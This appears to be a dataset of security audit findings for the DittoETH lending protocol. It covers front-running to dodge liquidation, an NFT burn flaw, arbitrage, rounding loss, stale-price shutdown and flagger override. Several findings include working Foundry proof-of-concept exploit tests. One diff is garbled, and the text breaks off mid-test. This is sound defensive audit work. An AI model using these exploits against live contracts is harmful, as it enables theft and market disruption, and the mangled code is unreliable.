basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n -Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidationчhighчA shorter can keep a unhealthy short position open by minting an NFT of it and front-running attempts to liquidate it with a transfer of this NFT (which transfers the short position to the new owner)\\nA Short Record (SR) is a struct representing a short position that has been opened by a user. It holds different informations, such as how much collateral is backing the short, and how much debt it owe (this ratio is called Collateral Ratio or CR) At any time, any user can flag someone's else SR as \"dangerous\", if its debt grows too much compared to its collateral. This operation is accessible through `MarginCallPrimaryFacet::flagShort`, which check through the `onlyValidShortRecord` modifier that the SR isn't `Cancelled` If the SR is valid, then its debt/collateral ratio is verified, and if its below a specific threshold, flagged. But that also means that if a SR is considered invalid, it cannot be flagged. And it seems there is a way for the owner of a SR to cancel its SR while still holding the position.\\nThe owner of a SR can mint an NFT to represent it and make it transferable. This is done in 5 steps:\\n`TransferFrom` verify usual stuff regarding the NFT (ownership, allowance, valid receiver...)\\n`LibShortRecord::transferShortRecord` is called\\n`transferShortRecord` verify that SR is not `flagged` nor `Cancelled`\\nSR is deleted (setting its status to Cancelled)\\na new SR is created with same parameters, but owned by the receiver.\\nNow, let's see what would happen if Alice has a SR_1 with a bad CR, and Bob tries to flag it.\\nBob calls flagShorton SR_1, the tx is sent to the mempool\\nAlice is watching the mempool, and don't want her SR to be flagged:\\nShe front-run Bob's tx with a transfer of her SR_1 to another of the addresses she controls\\nNow Bob's tx will be executed after Alice's tx:\\nThe SR_1 is \"deleted\" and its status set to `Cancelled`\\nBob's tx is executed, and `flagShort` reverts because of the `onlyValidShortRecord`\\nAlice can do this trick again to keep here undercol SR until it can become dangerous\\nBut this is not over:\\nEven when her CR drops dangerously (CR<1.5), `liquidateSecondary` is also DoS'd as it has the same check for `SR.Cancelled`\\nAdd these tests to `ERC721Facet.t.sol` :\\nFront-running flag\\n```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(\"Alice\"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(\"AliceSecondAddr\");\\n address bob = makeAddr(\"Bob\"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(\"randomUser\"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n\\nFront-running liquidateSecondary\\n```\\n function test_audit_frontrunPreventFlagAndSecondaryLiquidation() public {\\n address alice = makeAddr(\"Alice\"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(\"AliceSecondAddr\");\\n address aliceThirdAddr = makeAddr(\"AliceThirdAddr\");\\n address bob = makeAddr(\"Bob\"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(\"randomUser\"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //set cRatio below 1.1\\n setETH(700 ether);\\n \\n //Alice is still blocking all attempts to flag her short by transfering it to her secondary address by front-running Bob\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n\\n //Alice front-run (again// rest of code) Bob and transfers the NFT to a third address she owns\\n vm.prank(aliceSecondAddr);\\n diamond.transferFrom(aliceSecondAddr, aliceThirdAddr, 1);\\n\\n //Bob's try again on the new address, but its attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n STypes.ShortRecord memory shortRecord = getShortRecord(aliceSecondAddr, Constants.SHORT_STARTING_ID);\\n depositUsd(bob, shortRecord.ercDebt);\\n vm.expectRevert(Errors.MarginCallSecondaryNoValidShorts.selector);\\n liquidateErcEscrowed(aliceSecondAddr, Constants.SHORT_STARTING_ID, DEFAULT_AMOUNT, bob);\\n }\\n```\\nчOwner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidationчBecause of this, a shorter could maintain the dangerous position (or multiple dangerous positions), while putting the protocol at risk.ч```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(\"Alice\"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(\"AliceSecondAddr\");\\n address bob = makeAddr(\"Bob\"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(\"randomUser\"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n -Previous NFT owner can burn NFT from the new ownerчhighчShort records can be transferred as NFTs. Internally, the short record is deleted from the sender and re-created for the new owner (receiver). However, the `tokenId` of the deleted short record is not reset, allowing the previous NFT owner to burn the NFT from the new owner.\\nShort positions, i.e., short records, can be represented as an NFT (ERC-721) with a specific `tokenId`, storing the reference to the short record id in the `shortRecordId` property of the `nftMapping` mapping.\\nSuch a short record can be transferred to another address by sending the NFT to the new owner. Internally, when transferring the ERC-721 token, the `transferShortRecord` function is called (e.g., in line 162 of the `ERC721Facet.transferFrom` function).\\nThe `transferShortRecord` function first validates if the short record is transferable (e.g., not flagged and not canceled) and then calls the `deleteShortRecord` function in line 132 to delete the short record from the `shortRecords` mapping. Thereafter, a new short record with the values of the transferred short record is created with the new owner as the shorter, and the `nftMapping` struct is updated accordingly.\\ncontracts/libraries/LibShortRecord.sol#L132\\n```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n\\nHowever, the `LibShortRecord.deleteShortRecord` function neglects to reset and delete the short record's `tokenId`, which is initially set to the `tokenId` of the newly minted NFT in line of the `ERC721Facet.mintNFT` function. Consequently, upon transferring the short record, the deleted short record still references the transferred NFT's `tokenId`, in addition to the new short record which also references the same `tokenId`. Thus, two short records (with different owners), one being even deleted, reference the same NFT token.\\nThis oversight leads to the following issues (with number 3 being the most severe):\\nThe `ERC721Facet.balanceOf` function will report an incorrect NFT token balance for the previous NFT owner: If the short record was only partially filled before transferring it as a NFT, the remaining short record can still be fully filled, resetting the `SR.Cancelled` status. This will cause the `balanceOf` function to include this short record, and due to the short record still referencing the transferred NFT's `tokenId`, this NFT is still counted as owned by the previous owner.\\nThe previous NFT owner can not tokenize the remaining short record: As the `tokenId` of the deleted short record is not reset, the previous owner can not tokenize the remaining short record as any attempt to mint a new NFT via the `ERC721Facet.mintNFT` function will revert with the `Errors.AlreadyMinted` error.\\nThe previous NFT owner can burn the NFT from the new owner: As the `tokenId` of the deleted and partially filled short record is not reset, the short can be fully filled, resetting the `SR.Cancelled` status. By subsequently combining this short with another short using the `ShortRecordFacet.combineShorts` function, the combined shorts will have their associated NFT burned.\\nPlease note that the owner of the transferred short record can re-mint a NFT for the short via the `ERC721Facet.mintNFT`, but if the owner is a contract, the contract may lack the required functionality to do so.\\nThe following test case demonstrates the outline issue 3 above:\\nчConsider resetting the `tokenId` of the deleted short record in the `LibShortRecord.deleteShortRecord` function.чThe previous NFT owner can burn the NFT from the new owner.\\nIf this NFT transfer was part of a trade and, for instance, sent to an escrow contract, the previous NFT owner can burn the NFT from the escrow contract, while the escrow contract lacks the functionality to re-mint the NFT for the short record. This renders the short record unusable, and funds (collateral) associated with the short record are lost.ч```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n -Instant arbitrage opportunity through rETH and stETH price discrepancyчlowчUser can choose to withdraw their zETH to be a rETH or stETH, while in reality most user will choose the best return (highest value between rETH and stETH), instant arbitrage will happen and this will trigger pool imbalance, draining one over the other.\\nIn DittoETH, they accept two special types of Ethereum tokens: rETH and stETH. These tokens are based on regular ETH but are designed to stay close in value to one regular Ether. However, in reality, they can have slightly different values. rETH, stETH.\\nIn practice, when user want to withdraw, they can choose between rETH and stETH based on which one is worth more at that moment. The system doesn't really care which one you put in when a user first deposited their asset.\\nNow, here's where it gets interesting. Because rETH and stETH can have slightly different values, a savvy user could deposit the cheaper one, get a zeth, and then withdraw the more valuable rETH and stETH. a quick way to make some extra profit\\nAs we can see on line 110-112, the rETH or stETH withdrawn is depends on `ethAmount`, which from `_ethConversion` it's amount is 'equal' between rETH and stETH\\n```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\nчConsider to use oracle to adjust the price difference between rETH and stETHчInstant arbitrage opportunity through rETH and stETH price discrepancy, will also trigger imbalance between rETH and stETH pool.ч```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n -Division before multiplication results in lower `dittoMatchedShares` distributed to usersчmediumчShares amount is rounded down to number of days staked. Max truncation is 1 day, min time is 14 days. At most 1 / 14 * 100% = 7.1% of accrued shares will be truncated.\\nDivision before multiplication\\n```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n\\nSuppose `timeTillMatch = 14.99 days`, `eth = 1e18`. Expected result is `14.99 * 1e18 / 1 = 14.99e18 shares`. Actual result is `1e18 * (14.99 / 1) = 14e18 shares`ч```\\n- uint88 shares = eth * (timeTillMatch / 1 days);\\n+ uint88 shares = uint88(uint256(eth * timeTillMatch) / 1 days);\\n```\\nчUp to 7.1% of user's shares will be truncatedч```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n -Using a cached price in the critical shutdownMarket()чmediumчThe `MarketShutdownFacet::shutdownMarket()` is a critical function allowing anyone to freeze the market permanently. The function determines whether or not the market will be frozen based on the asset collateral ratio calculated from a cached price, which can be outdated (too risky for this critical function).\\nOnce the market is frozen, no one can unfreeze it.\\nThe `shutdownMarket()` allows anyone to call to freeze the market permanently when the asset collateral ratio threshold (default of 1.1 ether) has been reached. Once the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market. Therefore, the `shutdownMarket()` becomes one of the most critical functions.\\nTo calculate the asset collateral ratio (cRatio), the `shutdownMarket()` executes the `_getAssetCollateralRatio()`. However, the `_getAssetCollateralRatio()` calculates the `cRatio` using the cached price loaded from the `LibOracle::getPrice()`.\\nUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated. The function should consider only a fresh price queried from Chainlink.\\n```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L36\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L37\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L44\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L99чUsing a cached price in the critical shutdownMarket()\\nThe `shutdownMarket()` requires the most accurate price, not just a cached price. Execute the `LibOracle::getOraclePrice()` to get the accurate price from Chainlink.чUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated.\\nOnce the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market.ч```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n -Malicious trader can intentionally obtain `dittoMatchedShares` in some edges casesчlowчMalicious trader can intentionally obtain `dittoMatchedShares` by creating a bid order using a low price that nobody will ask, then wait for more than 14 days and the same malicious trader create an ask order using the same bid's low price causing the increase of `dittoMatchedShares`.\\nMalicious trader can create a bid order using the BidOrdersFacet::createBid() function at very low price, then the same malicious trader can wait some days until the minumum required in order to get `dittoMatchedShares` and set a `ask` order using the bid's low price. Please consider the next scenario:\\n```\\nMarket status:\\nassetX: current price 100\\n```\\n\\nMalicious trader creates the `bid order` for the `assetX` using the `price: 10` (low price compared to the current 100 price) and `ercAmount 10`. The low price is because nobody wants to sell at that price so the order can stay there without be matched.\\nThe `bid order` will be submitted to the order book because there are not `asks/sells` to fill at that price.\\nMalicious trader waits for more than 14 days. Additionally the malicious trader needs to wait until there are not `asks/sells` in the order book.\\nOnce the step 3 is ok, the Malicious trader creates the `ask order` at `price 10 and ercAmount10` (the bid's order price from step 1). The order is matched with the `bid order` from the step 1 and `dittoMatchedShares` are assigned to the malicious trader.\\nIt is a very edge case because the malicious trader needs an empty `ask/sells` orderbook so he can put his own `ask order` at the malicious bid order price but in conditions where the asset is not very trader the malicious actor can benefit from this.чVerify that the address from the `bid order` is not the same address who is creating the `ask` order.чMalicious actor can intentionally obtain `dittoMatchedShares` using `bid/asks` orders that he intentionally crafts. The `bid/ask` orders are created by the same malicious actor, so he won't lose assets.\\nTools used\\nManual reviewч```\\nMarket status:\\nassetX: current price 100\\n```\\n -Primary liquidation fee distribution may revert due to the inability to cover the caller feesчmediumчFee distribution during the primary short liquidation may revert due to an arithmetic underflow error in case the TAPP's escrowed ETH balance is insufficient to cover the caller (liquidator) fees.\\nDuring the primary liquidation, the `_marginFeeHandler` function called in line 126 handles the fee distribution for the liquidator (i.e., caller).\\nIf the eligible caller fee (callerFee) is less or equal to the ETH escrowed by the TAPP, the fee is deducted from `TAPP.ethEscrowed` and added to the liquidators escrowed ETH balance, `VaultUser.ethEscrowed`, in lines 271-274.\\nOtherwise, if the TAPP's escrowed ETH is insufficient to cover the caller fees, i.e., the `else` branch in line 274, the caller is given the `tappFee` instead of `gasFee`.\\nHowever, if `m.totalFee` exceeds the TAPP's `ethEscrowed`, it reverts with an arithmetic underflow error in line 278. This can be the case if the TAPP has little to no ETH escrowed after placing the forced bid as part of the liquidation, attempting to buy the debt token amount required to repay the short position's debt. In case the short's collateral is not sufficient to buy the debt tokens, the TAPP's escrowed ETH is utilized as well, potentially depleting the TAPP's escrowed ETH.\\nConsequently, the remaining `TAPP.ethEscrowed` is potentially lower than the calculated `m.totalFee`, resulting in the arithmetic underflow error in line 278.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L278\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\nчPrimary liquidation fee distribution may revert due to the inability to cover the caller fees\\nConsider checking if the TAPP's `ethEscrowed` is sufficient to cover the `m.totalFee` before deducting the fee from the TAPP's `ethEscrowed` balance and if not, give the caller the TAPP's `ethEscrowed` balance.чThe primary short liquidation fails, requiring to wait until the short position's collateral is sufficient to buy the debt tokens or the TAPP has sufficient collateral, or, if the short's collateral ratio further decreases, the short position is liquidated via the secondary liquidation (which adds additional risk to the peg of the asset as the overall collateral ratio could fall below 100%).ч```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n -Flag can be overriden by another userчhighчThe `setFlagger` function allows a new flagger to reuse `flaggerHint` flag id after `LibAsset.firstLiquidationTime` has passed after flagId has been updated.\\n```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L377-L404C13\\nSince the previous flagger can only liquidate the flagged short after `LibAsset.firstLiquidationTime` has passed, the flagged short will be unliquidated till that time. Both the ability to flag the short for first flagger and the ability to replace the first flagger starts at the same instant. This allows a new flagger to take control over the liquidation of the flagged short by finding some other liquidatable short and passing in the flagId of the previous flagger as the `flagHint`.\\nPOC Test\\n```\\ndiff --git a/test/MarginCallFlagShort.t.sol b/test/MarginCallFlagShort.t.sol\\nindex 906657e..3d7f985 100644\\n--- a/test/MarginCallFlagShort.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/MarginCallFlagShort.t.sol\\n@@ -169,6 // Add the line below\\n169,90 @@ contract MarginCallFlagShortTest is MarginCallHelper {\\n assertEq(diamond.getFlagger(shortRecord.flaggerId), extra);\\n }\\n \\n// Add the line below\\n function test_FlaggerId_Override_Before_Call() public {\\n// Add the line below\\n address flagger1 = address(77);\\n// Add the line below\\n address flagger2 = address(78);\\n// Add the line below\\n\\n// Add the line below\\n vm.label(flagger1, \"flagger1\");\\n// Add the line below\\n vm.label(flagger2, \"flagger2\");\\n// Add the line below\\n\\n// Add the line below\\n //create first short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord1 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 1);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag first short\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n diamond.flagShort(asset, sender, shortRecord1.id, Constants.HEAD);\\n// Add the line below\\n shortRecord1 = diamond.getShortRecord(asset, sender, shortRecord1.id);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger1);\\n// Add the line below\\n\\n// Add the line below\\n skip(TEN_HRS_PLUS);\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n\\n// Add the line below\\n //attempting direct liquidation by flagger2 fails since only allowed to flagger1\\n// Add the line below\\n\\n// Add the line below\\n //add ask order to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n uint16[] memory shortHintArray = setShortHintArray();\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //cancel the previously created ask order\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //reset\\n// Add the line below\\n setETH(4000 ether);\\n// Add the line below\\n\\n// Add the line below\\n //create another short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag second short by providing flagger id of flagger1. this resets the flagger id\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n 